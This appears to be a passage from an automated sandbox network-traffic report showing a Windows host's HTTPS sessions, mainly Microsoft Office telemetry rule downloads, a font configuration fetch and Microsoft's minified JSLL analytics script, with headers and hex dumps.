                                                                                                                                                                          2024-11-23 18:01:55 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          67192.168.2.54978813.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:54 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:55 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 411
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                          ETag: "0x8DC582B989AF051"
                                                                                                                                                                          x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180155Z-178bfbc474b9fdhphC1NYCac0n00000004ng00000000h91c
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:55 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          68192.168.2.54978913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:54 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:55 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 485
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                          ETag: "0x8DC582BB9769355"
                                                                                                                                                                          x-ms-request-id: 9a1c1dfd-501e-000a-5c30-3c0180000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180155Z-178bfbc474b9xljthC1NYCtw9400000004r000000000as7u
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:55 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          69192.168.2.54979313.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:55 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:55 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 427
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                          ETag: "0x8DC582BB556A907"
                                                                                                                                                                          x-ms-request-id: 2145ee07-e01e-003c-0347-3cc70b000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180155Z-15b8b599d88wn9hhhC1TEBry0g000000037000000000p7fc
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:55 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          70192.168.2.54979413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:55 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:55 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 502
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                          ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                          x-ms-request-id: 226702aa-001e-000b-5c83-3d15a7000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180155Z-174c587ffdfgcs66hC1TEB69cs000000030g00000000rdkd
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:55 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          71192.168.2.5498012.23.161.164443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:56 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                          Range: bytes=0-2147483646
                                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                                          2024-11-23 18:01:57 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                          Server: ECAcc (lpl/EF06)
                                                                                                                                                                          X-CID: 11
                                                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                          X-Ms-Region: prod-neu-z1
                                                                                                                                                                          Cache-Control: public, max-age=228625
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:57 GMT
                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                          Connection: close
                                                                                                                                                                          X-CID: 2
                                                                                                                                                                          2024-11-23 18:01:57 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          72192.168.2.54979613.107.246.634436500C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:56 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                          Host: js.monitor.azure.com
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                          Referer: https://learn.microsoft.com/
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          2024-11-23 18:01:57 UTC868INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:57 GMT
                                                                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                          Content-Length: 207935
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                          Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                          ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                          x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                                                          x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                          x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          x-azure-ref: 20241123T180157Z-178bfbc474bvjk8shC1NYC83ns00000004k000000000m1cz
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:57 UTC15516INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                          Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                          2024-11-23 18:01:57 UTC16384INData Raw: 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28 31 31 29 5d 3d 22 49 50 72 6f 6d 69 73 65 22 29 2c 61 2e 74 6f
                                                                                                                                                                          Data Ascii: &&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(11)]="IPromise"),a.to
                                                                                                                                                                          2024-11-23 18:01:57 UTC16384INData Raw: 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 59 28 65 2c 22 6c 69 73 74 65 6e 65 72 73 22 2c 7b 67
                                                                                                                                                                          Data Ascii: on(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(e){Y(e,"listeners",{g
                                                                                                                                                                          2024-11-23 18:01:57 UTC16384INData Raw: 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 41 5b 74 65 5d 28 65 29 2c
                                                                                                                                                                          Data Ascii: hComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};function c(){A[te](e),
                                                                                                                                                                          2024-11-23 18:01:57 UTC16384INData Raw: 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4e 6c 28 29 7b 72 65 74 75 72
                                                                                                                                                                          Data Ascii: fined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return null}function Nl(){retur
                                                                                                                                                                          2024-11-23 18:01:57 UTC16384INData Raw: 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 65 29 7b 76 61 72 20 6f 3d 74 68 69 73 2c 63 3d 7b 7d 3b
                                                                                                                                                                          Data Ascii: me failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(a,e){var o=this,c={};
                                                                                                                                                                          2024-11-23 18:01:57 UTC16384INData Raw: 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54 61 67 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72
                                                                                                                                                                          Data Ascii: ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageTags=function(e,t){var
